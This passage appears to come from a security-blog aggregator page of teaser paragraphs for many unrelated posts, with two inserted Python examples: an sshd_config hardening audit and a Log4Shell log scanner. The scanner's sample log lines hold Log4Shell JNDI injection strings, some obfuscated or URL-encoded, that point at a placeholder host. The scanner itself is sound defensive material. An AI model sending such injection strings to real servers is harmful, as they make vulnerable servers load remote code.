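    print("accepted now:", verify(RFC_KEY, totp(RFC_KEY, now), now))
```

The same arithmetic explains why a server with a drifting clock locks everybody out: if the server is more than one step away from the phone, no code in the window matches, which is why the tutorial's setup should sit alongside working NTP.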

The Top Cyber Attacks of December 2021

Things tend to slow down for many businesses at the end of the year. As the holidays roll in and employees take time off with their families, December is generally a time to take stock of what transpired over the year and start looking ahead to the next one. Unfortunately, that’s not how cybercriminals operate.

Six-Figure Savings: How A Financial Institution Banked On Forward Enterprise For Massive Returns

As one large, global financial institution prepared for employees to return to the office, its IT team identified a significant issue with the company's more than 8,000 access switches. The switches in question were used to provide connectivity to IP Phones – a crucial part of people's work across virtually all areas of the company.

Six Pillars of DevSecOps

DevOps and Security. One encourages speed, agility, iterative learning, enabling technology to keep up with the pace of business. The other wants to keep you safe, slows things down, crosses all the T's and dots all the I's. They seem to be at odds with one another — but do they need to be? DevSecOps says no, that’s not the way it has to be.

Behind the Buzzword: Four Ways to Assess Your Zero Trust Security Posture

With just about everything delivered from the cloud these days, employees can now collaborate and access what they need from anywhere and on any device. While this newfound flexibility has changed the way we think about productivity, it has also created new cybersecurity challenges for organizations. Historically, enterprise data was stored inside data centers and guarded by perimeter-based security tools.

Endangered data in online transactions and how to safeguard company information

This blog was written by an independent guest blogger. Online transactions are essential for every modern business. From online shopping to banking, transferring funds, and sending invoices, online transactions ensure utter convenience and efficiency. However, the familiarity of making financial transactions online can make people forget about security and all the dangers that they may be facing. On top of that, new cybersecurity threats keep popping up constantly.

SSH Client Config Files and How to Use Them

SSH client configuration files allow us to connect to servers with pre-configured commands. This saves typing each SSH command parameter when logging into a remote machine and executing commands on a remote device. This article will examine secure shell (SSH) client configuration (config) files and their functions. Specifically, we will show an example of an SSH client config file to learn how to use these files before creating an example config file that connects to a fictitious server.

Proactive Cybersecurity: How to Stay Ahead of Today's Threats

For many organizations, cybersecurity is an overwhelming challenge. New threats emerge seemingly in the blink of an eye, and IT and security teams are constantly reacting to the moves of bad actors who always remain one or two steps ahead and get to dictate where and when their attacks are carried out. As you might expect, a reactionary approach to cybersecurity is not ideal. It’s typically borne of necessity due to undermanned teams or inadequate resources.

Security Cloud Considerations for Delivering Security Service Edge (SSE)

In recent blogs, we’ve explored the role of Security Service Edge (SSE) technologies as part of a SASE architecture, and the key differences between SSE and SASE. But so far, we’ve focused more on overall functionality than on its realization and what SSE means from a cloud design and implementation perspective. In this post, we shift gears to put a spotlight on networking and infrastructure as it relates to security clouds.

Fourth Party Risk Management Explained

Most organizations use at least some (and perhaps many) external vendors in their daily operations, sometimes even to provide mission-critical services or supplies; we’ve discussed them before as third-party vendors and the risks they bring. Indeed, most businesses today already consider third-party risk management in their overall cybersecurity protocols.

What You Should Know About the Rise in AWS S3 Security Data Breaches

Amazon Web Services (AWS) is a cloud platform designed to meet the growing demand for cloud computing worldwide. AWS provides a set of cloud services such as storage, analytics, blockchain, business applications, security, and machine learning. Within this cloud environment is Amazon Simple Storage Services (S3), a cloud storage solution bringing scalability, data availability, security, and performance to companies of any size through so-called “buckets” or data containers.

CISO's Corner: The Four Best Cybersecurity Investments You Can Make During the Cyber Talent Shortage

The need for strong cybersecurity has reached critical mass. Seventy-six percent of security leaders have reported an increase in cyber-attacks over the past year -- accelerated by the COVID-19 pandemic and a rapid shift from an in-office to a remote workforce and on-premises to cloud infrastructure.

What is Encryption? Difference between symmetric and asymmetric encryption

Encryption is the act of encoding information to make it unreadable for anyone other than those who are authorized to read it. There are two types of encryption: symmetric and asymmetric. Symmetric encryption uses the same key to encode and decode data, while asymmetric encryption uses different keys - one public key that can be shared with everyone, and one private key only known by the owner. In this video, we discuss the meaning of encryption and what it is used for. We also go over what asymmetric and symmetric encryption are.

Decibel Therapeutics Transforms Clinical Trial Document Management with Egnyte

The documentation around clinical studies is large and diverse – and it all must adhere to GxP standards. Learn how Heather Wolff, Vice President, Clinical Development Operations at Decibel Therapeutics, and her team of data managers, clinical operation experts, regulatory operations, medical writers, and biostats use Egnyte to streamline their compliance and data management processes. And, to learn more about how Egnyte helps other life sciences companies store, share, and audit critical documentation around clinical trials, visit: Egnyte.com/solutions/life-sciences.

The Missing Pieces in Securing your SDLC

Navigating the world of secure software development is hard. There is a lot of noise and not enough time to investigate everything thoroughly. Make your life and the lives of your colleagues easier by building a world-class DevSecOps automation pipeline. Automate feedback delivery in a way that makes sense. It doesn’t have to be hard; automate the pain away!

Demystifying DevOps-Pros, cons, dos & don'ts

We hear a lot about DevOps, but how do we turn it from myth into reality? In this panel with Waleed Arshad, Community Manager at Snyk, Frank Dornberger, Team Lead of DevSecOps at movingimage EVP GmbH, and Idir Ouhab Meskine, Staff Solutions Engineer at Splunk, we go over the pros, cons, dos and don'ts of DevOps.

CloudCasa Introduces New Starter Plan, Bring-Your-Own Storage, and more Application Support for Kubernetes Backup-as-Service

The CloudCasa elves have been busy in their workshop for the past few months, and in December we delivered a stocking full of brand-new Kubernetes data protection goodies just in time for the holidays!

AT&T teams with Cisco to create new managed SASE offering

Whether organizations call it digital transformation or just using technology to create opportunities for new, easier ways to work, one thing is certain. Businesses increasingly need to find simpler ways to securely build and manage new kinds of connections that support an era of: This is exactly the drive behind the latest collaboration between the cybersecurity and networking experts at AT&T and Cisco.

15 simple steps to stay secure at work without burning yourself out

No-one wants to feel burned out at work. Battling physical or emotional exhaustion can quickly impact your health, happiness, and any sense of professional fulfillment. That in turn can affect your productivity and the likelihood that you’ll make an honest mistake that puts your company’s data at risk.

Healthcare systems under attack

In October 2021, the IT systems of the Israeli healthcare system suffered a ransomware attack from which it took weeks to recover. Although the motive for the cyberattack on this occasion was not geopolitical but financial, government sources said they feared that far more dangerous incidents against this sector could be carried out by groups linked to foreign powers such as Iran.

Secure DevOps on Microsoft Azure: Reduce Cloud & Container Risk

Microsoft Azure is a great choice for enterprises looking to quickly build and deploy apps to the cloud. However, cloud teams must simultaneously consider how to implement DevSecOps practices to reduce, manage and avoid risks. Sysdig is collaborating with Microsoft to simplify cloud and container security and deliver robust SaaS-based solutions for the Azure ecosystem.

ICYM: 5 Major Considerations for Slack Security in 2022

Last month, on December 8, we hosted a webinar alongside Bluecore CISO Brent Lassi to discuss data security risks facing high-growth organizations like his on SaaS systems like Slack. With 2022 just beginning, we wanted to share 5 important lessons about Slack and SaaS security that are worth keeping in mind this year.

Developer security resolutions for 2022

As 2022 begins, it’s a great time to set resolutions for the coming year. Don’t worry, we don’t expect you to become a CrossFit guru or break world records on your Peloton. Instead, how about you set goals to improve your abilities as a secure developer? All too often, we choose resolutions that set ourselves up for failure. A better approach is to set realistic goals.

Adding trust to the IoT with Blockchain

Without trust there is nothing. So, while the IoT is changing many parts of the digital transformation landscape, real trust is often the missing component for businesses to fully embrace the technology. How can we be sure that the temperature gauge was working and calibrated? Was it really in the location it said it was and was the limit the actual limit?

5 Best Practices for Securing SSH

Strictly following security best practices is the first step in cybersecurity. Although SSH is the industry standard for secure and effective remote server access, as with any software it is only as secure as the configuration applied to the server and the client. In this article, we’ll explore five SSH best practices you should observe to boost the security of your infrastructure.
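Since the point above is that SSH is only as secure as its configuration, here is an added example, not code from the original article, that audits an sshd_config the way a practitioner would before trusting a host: it honours sshd's first-match rule (a keyword's first value wins, later duplicates are ignored), stops at the first Match block because everything after it is conditional, and applies OpenSSH's documented defaults for keywords that are absent. The sample configs are constructed.

```python
"""Audit sshd_config for the hardening settings that matter most.

Added example, not from the original article. WEAK_CONFIG and HARD_CONFIG
are constructed. DEFAULTS are OpenSSH's documented defaults, applied when
a keyword is not set at all.
"""
import re

DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
    "x11forwarding": "no",
    "maxauthtries": "6",
}

# keyword -> (predicate on the effective value, finding text)
CHECKS = {
    "permitrootlogin": (lambda v: v in {"no", "prohibit-password"},
                        "PermitRootLogin allows root password logins"),
    "passwordauthentication": (lambda v: v == "no",
                               "PasswordAuthentication is on; use keys (plus MFA)"),
    "pubkeyauthentication": (lambda v: v == "yes",
                             "PubkeyAuthentication is disabled"),
    "permitemptypasswords": (lambda v: v == "no",
                             "PermitEmptyPasswords is on"),
    "x11forwarding": (lambda v: v == "no",
                      "X11Forwarding is on; unnecessary attack surface"),
    "maxauthtries": (lambda v: v.isdigit() and int(v) <= 4,
                     "MaxAuthTries is high; limit password guessing per connection"),
}


def parse_sshd_config(text: str) -> dict:
    """Effective global settings: lower-cased keyword -> first value seen.
    Comments are stripped, 'Key Value' and 'Key=Value' both accepted, and
    parsing stops at the first Match block."""
    effective: dict = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match "):
            break
        parts = re.split(r"[ \t=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        effective.setdefault(key, value)  # sshd keeps the first occurrence
    return effective


def audit(text: str) -> list:
    """Returns a list of finding strings; empty means all checks passed."""
    effective = parse_sshd_config(text)
    findings = []
    for key, (ok, message) in CHECKS.items():
        value = effective.get(key, DEFAULTS[key])
        if not ok(value):
            findings.append(f"{message} (effective value: {value})")
    return findings


# Constructed: a typical default-ish, weak configuration
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
X11Forwarding yes
PermitRootLogin no   # ignored: sshd already took 'yes' above
"""

# Constructed: a hardened configuration
HARD_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
X11Forwarding no
MaxAuthTries 3
Match User deploy
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARD_CONFIG)):
        print(f"{label}: {audit(cfg) or 'no findings'}")
```

The Match-block handling is the caveat worth remembering: the hardened sample still re-enables password authentication for one user, which this audit deliberately does not evaluate, so anything after a Match line needs a separate look.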

Cybersecurity Trends and Predictions for 2022

The 2022 new year is here, and with it the chance to look back on 2021. Reviewing last year's security trends can give us insight into what is coming. Last year was a record-breaking year for data breaches: according to the Identity Theft Resource Center (ITRC), the number of publicly reported breaches in the first three quarters of 2021 alone exceeded the total number of incidents in the whole of 2020.

Making Sense of the Constantly Changing Log4Shell Landscape

If you find yourself baffled by the influx of events and newly discovered vulnerabilities affecting the popular Apache Log4j Java logging library, this post is for you. This post aims to survey the entire flow of events since the first discovery of CVE-2021-44228, AKA Log4Shell, to the present date, explain the important aspects of each related vulnerability, as well as provide practical remediation and mitigation advice.
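Both Log4Shell items above (the December advisory and this survey) come down to the same string reaching a vulnerable logger, so here is an added example, not code from either post, of the triage check a defender runs over web logs: it URL-decodes, collapses the nested-lookup obfuscations seen in the wild (`${lower:j}`, `${::-j}` default-value tricks) the way Log4j's own substitutor would, and then looks for the `${jndi:` prefix. The log lines are constructed and use documentation IP ranges.

```python
"""Log4Shell (CVE-2021-44228) probe detection over access-log lines.

Added example, not from the original posts. SAMPLE_LOG is constructed and
uses documentation address ranges; no real hosts are contacted.
"""
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match) -> str:
    """Evaluate one innermost ${...} the way Log4j's lookup substitution
    would when the lookup exists only to hide the word 'jndi':
    ${x:-default} -> default, ${lower:X} -> x, ${upper:x} -> X.
    Anything else is left exactly as written."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, sep, rest = body.partition(":")
    if sep and kind.lower() == "lower":
        return rest.lower()
    if sep and kind.lower() == "upper":
        return rest.upper()
    return match.group(0)


def normalize(text: str) -> str:
    """URL-decode twice (double encoding is common), then collapse
    obfuscating lookups from the inside out until nothing changes."""
    text = unquote(unquote(text))
    while True:
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            return new
        text = new


def is_log4shell_probe(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None


def scan(lines) -> list:
    """Returns the lines that carry a JNDI lookup after normalisation."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample log (combined log format); first four are probes
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:03:14:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.5/b} HTTP/1.1" 400',
    '198.51.100.7 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/c}"',
    '198.51.100.7 - - [10/Dec/2021:03:14:13 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.5%2Fd%7D HTTP/1.1" 200',
    '192.0.2.10 - - [10/Dec/2021:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2021:03:15:02 +0000] "GET /?price=${amount} HTTP/1.1" 200',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("probe:", hit)
```

Treat a hit as evidence that someone tried, not that they succeeded: the string is logged whether or not the application was vulnerable, and the fix is still patching Log4j, with this scan used to find where the attempts landed and to prioritise the hosts to check first.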

Best Practices for Mobile App Security Testing for Developers & Non-Developers

Mobile application security testing (MAST) covers a wide range of topics, including authentication, authorization, data security, session management, and vulnerabilities for hacking. The mobile AST market is made up of buyers and sellers of products that identify vulnerabilities and apps used with mobile platforms during or post-development.

The Best of Both Worlds: Pairing Tripwire ExpertOps with Technical Account Management

This won’t come as a surprise to anyone who’s spoken to me for more than five minutes, but I am a Doctor Who fan. In fact, “fan” is being kind. I’m hopelessly obsessed with the show to the point that more than one ‘Who’ actor has a restraining order out on me.

Key Considerations for Canada's Forthcoming National Cyber Security Strategy

On December 16, Prime Minister Justin Trudeau released mandate letters tasking his ministers of national defense, foreign affairs, public safety, and industry to develop a new “National Cyber Security Strategy.” He specifically highlighted the need for the strategy to “articulate Canada’s long-term strategy to protect our national security and economy, deter cyber threat actors, and promote norms-based international behavior in cyberspace,” as quoted by Global News.

CTF secrets revealed: TopLang challenge from SnykCon 2021 explained

If you attended SnykCon 2021, you may remember our inaugural CTF: Fetch the Flag. In this CTF, TopLang was a web challenge of medium difficulty that we received a lot of positive feedback about. So for those of you that loved it, this write-up explains how our team internally approached tackling and solving this challenge. This challenge was a pretty typical example of what is known as an “oracle attack” using blind SQL injection.

Sentara Uses Identity to Help Drive Better Health Outcomes

I spent part of the summer helping my mother recover from a major surgery. During our time together, she asked: “What is it your company does again?” So I explained: “We help manage digital identities. For example, if your healthcare system used ForgeRock, you could login to the website and see your records and medications from your surgeon, your GI specialist, your general practitioner, your physical therapist and more.

ISO 27001 Penetration Testing: What Is It And Why You Need It

ISO 27001 is an international information security standard. You may have heard of it, but do you know what it really means? What does ISO 27001 penetration testing mean for your company's cyber-security efforts? And why should you care about implementing ISO 27001 in the first place? Watch this video to find out!

SMB Ports Explained: 445 and 139 - Learn the difference

In this video I go over the difference between SMB ports 445 and 139. It's important to know how these two ports can help you keep your network safe from attack, so watch this video if you want to learn more about them! Cyphere is a UK-based cyber security services provider helping organisations to secure their most prized assets. We provide technical risk assessment (pen testing/ethical hacking) and managed security services. This advice is a true third party opinion, free from any vendor inclinations or reselling objectives.

Technology's contributions toward safety in healthcare

This blog was written by an independent guest blogger. Technology in healthcare has the potential to make all the difference in terms of safety outcomes. Right now, modern tech is pushing the envelope of what is possible in the doctor’s office and the patient’s home, as telehealth and artificial intelligence transform the landscape of medical care. But technology isn’t always safe.

Siemplify is Joining Forces with Google Cloud

Today, I am excited and proud to announce that Siemplify has been acquired by Google. This marks an important milestone in the Siemplify journey. When co-founders Alon Cohen and Garry Fatakhov and I started Siemplify in 2015, we all knew, from our experience building and training security operations centers from around the world, that security operations was a function in dire need of innovation.

Power the SOC of the Future with the DataLinq Engine - Part 1

Evidence continues to mount that it isn’t a matter of if, but when and how an organization will be attacked. So, we are seeing Security Operations Centers (SOCs) narrow the focus of their mission to become detection and response organizations. As they look to address additional use cases, including threat detection and monitoring, investigation, incident response and hunting, data becomes even more important.

Redefining Challenges for Zero Trust in the Federal Space

President Biden’s Executive Order 14028 to improve the nation’s cybersecurity and protect federal government networks was released more than half a year ago. At the time, one of the most exciting aspects about it was the multiple uses of the term “zero trust,” as Netskope discussed in a blog at the time. However, it’s clear that federal agencies are still working out the specifics of how to actually approach implementing zero trust.

New workshop for securing a DevOps pipeline with Snyk, Bitbucket, and AWS

Development teams are frequently under the gun to deliver software quickly, which is difficult to do without modern tools to build, test, and deploy applications efficiently. That’s why Atlassian’s Bitbucket Cloud — a Git-based source code repository service in the cloud that streamlines software development for collaborative teams — was built for both speed and effi